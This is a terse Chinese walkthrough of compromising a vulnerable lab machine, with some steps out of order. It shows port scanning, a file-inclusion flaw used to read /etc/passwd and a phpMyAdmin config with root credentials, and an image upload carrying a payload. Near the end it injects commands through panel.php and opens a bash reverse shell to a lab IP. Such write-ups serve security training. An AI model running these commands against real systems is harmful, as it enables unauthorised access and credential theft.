查找靶机IP

nmap查看开放端口22，80

目录扫描

查看网站，典型注入

phpmy

果然是登陆界面，不过不知道账户及密码

in.php

php的配置信息，可以看看

add.php

上传文件目录，可以上传，不过没有回显

其他页面

show.php和c.php访问页面空白

文件目录

/uploaded_images/
果然如此，刚才上传失败了

文件包含漏洞

访问test.php

得到以下界面
翻译结果：“file”参数为空。请在“file”参数中提供文件路径
需要一个参数，可能存在文件包含漏洞
POST方法成功注入

最后一个id 1000为ica的也有ssh连接权限

下载其他文件
asswd可以下载，shadow无法下载。前面说过有phpmyadmin,可以下载以下它的配置文件
file=/var/www/phpmy/config.inc.php

里面有用户名和密码
$cfg’Servers’[‘user’] = ‘root’;
$cfg’Servers’[‘password’] = ‘roottoor’;
ssh直接登录

回到网站，使用burp模糊注入测试

跳转到

利用kali上shell

需要修改 反弹代理 里面 ip


上传成功

访问之前的图片路径



查看权限

提权
内核漏洞提权
python -c ‘import pty;pty.spawn(’/bin/bash’)’
uname -a

查找内核漏洞

放到www目录下，开启apache服务
service apache2 start

网页显示上传失败。换一种思路，上传一张正常图片并在burp中抓包，在图片末尾加入
接下来还是使用burp，在URL的post请求中加入POST /panel.php?cmd=cat%20/etc/passwd;ls，正文中加入load=/uploaded_images/apple233.png&continue=continue

kali命令行里输入nc -lvnp 9999开始监听，同时burp的post请求中执行echo “bash -i >& /dev/tcp/192.168.253.136/99990>&1” | bash，注意要将此命令先经过URL编码才能发送